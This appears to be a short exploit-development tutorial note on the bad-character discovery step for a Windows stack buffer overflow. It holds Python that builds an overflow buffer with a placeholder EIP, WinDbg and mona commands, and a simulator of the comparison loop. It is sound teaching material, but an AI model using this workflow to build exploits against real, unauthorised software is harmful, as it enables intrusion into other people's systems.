When to reach for this
You’ve got a stack overflow working in WinDbg/x64dbg, EIP control confirmed, and now you need to know which bytes get mangled by the target binary’s input handling before you can place real shellcode. This is the loop you run in the payload position, then compare what made it onto the stack against what was sent.
The snippet
```python
# Send all bytes 0x00..0xff in order. After hitting the breakpoint,
# in WinDbg: db esp L100, then !mona compare -f badchars.bin -a esp
from struct import pack

# Most overflows can't tolerate \x00 (string terminator). Many also
# break on \x0a (LF) and \x0d (CR). Start by excluding only \x00:
SKIP = b'\x00'
badchars = bytes(b for b in range(0x00, 0x100) if b not in SKIP)

# Save a copy on disk so mona can diff it against actual stack contents
with open('badchars.bin', 'wb') as f:
    f.write(badchars)

# Then in your exploit (OFFSET = distance to the saved return address,
# found earlier):
buf = b'A' * OFFSET
buf += pack('<L', 0x41414141)  # placeholder EIP
buf += badchars
```
The WinDbg side
```text
0:000> g                                # run, hit access violation
0:000> db esp L100                      # dump 256 bytes from current esp
0:000> .writemem stack.bin esp L100     # save stack to disk for mona
0:000> !mona compare -f badchars.bin -a esp
```
mona prints any mismatched bytes. Add those to SKIP, regenerate, and repeat until the comparison comes back clean.
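The same send/compare/exclude loop, as an added example that is not the note's or mona's code: three constructed input handlers stand in for the target binary (a strcpy-style copy, a gets-style line reader and a tolower pass), 0xcc fill models stale stack bytes, and the comparison tells a dropped byte from a substituted one and from truncation, which is why a single terminator shows up as a run of mismatches rather than as many bad chars.

```python
"""Send/compare/exclude loop from the note against simulated input handlers.
Added example, not the note's or mona's code; the handlers are constructed
stand-ins and 0xcc fill models stale stack bytes (what db esp L100 would show).
"""
STALE = b'\xcc'
SIZE = 0x100

def strcpy_like(data):
    """Copies up to the first NUL; nothing after it reaches the stack."""
    return data.split(b'\x00', 1)[0][:SIZE].ljust(SIZE, STALE)

def gets_like(data):
    """Stops at LF (not stored) and strips CR; everything else is copied."""
    line = data.split(b'\x0a', 1)[0].replace(b'\x0d', b'')
    return line[:SIZE].ljust(SIZE, STALE)

def tolower_like(data):
    """Copies everything but case-folds ASCII uppercase (0x41..0x5a)."""
    return data.lower()[:SIZE].ljust(SIZE, STALE)

def probe(skip):
    """All bytes 0x00..0xff in order, minus those already known bad."""
    return bytes(b for b in range(SIZE) if b not in skip)

def first_mismatch(sent, landed):
    """Walk sent against landed; return (bad_byte, verdict), or None if clean."""
    i = j = 0
    while i < len(sent) and j < len(landed):
        if sent[i] == landed[j]:
            i, j = i + 1, j + 1
            continue
        if landed[j:j + 1] == sent[i + 1:i + 2]:
            return sent[i], 'dropped'  # stream continued without this byte
        # A later pair of sent bytes still present after this point means the copy
        # went on and this byte was substituted; otherwise the copy stopped here.
        rest = landed[j:]
        if any(sent[k:k + 2] in rest for k in range(i + 1, len(sent) - 1)):
            return sent[i], 'replaced:%02x' % landed[j]
        return sent[i], 'truncated'
    return None

def find_bad_chars(handler):
    """Send, compare, add the offender to SKIP, regenerate, repeat until clean."""
    bad = {}
    while True:
        sent = probe(bad)
        hit = first_mismatch(sent, handler(sent))
        if hit is None:
            return bad
        bad[hit[0]] = hit[1]
```

Against the real target, `handler(sent)` is the round trip through the debugger (send, break, `db esp L100`) and the verdicts are what you would read off the mona output.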
Variants
For SEH overflows, the buffer goes at the SEH-record offset rather than the return-address offset, but the comparison logic is identical.
Source / origin
Standard exploit-dev workflow. Variants of this appear in every Corelan tutorial.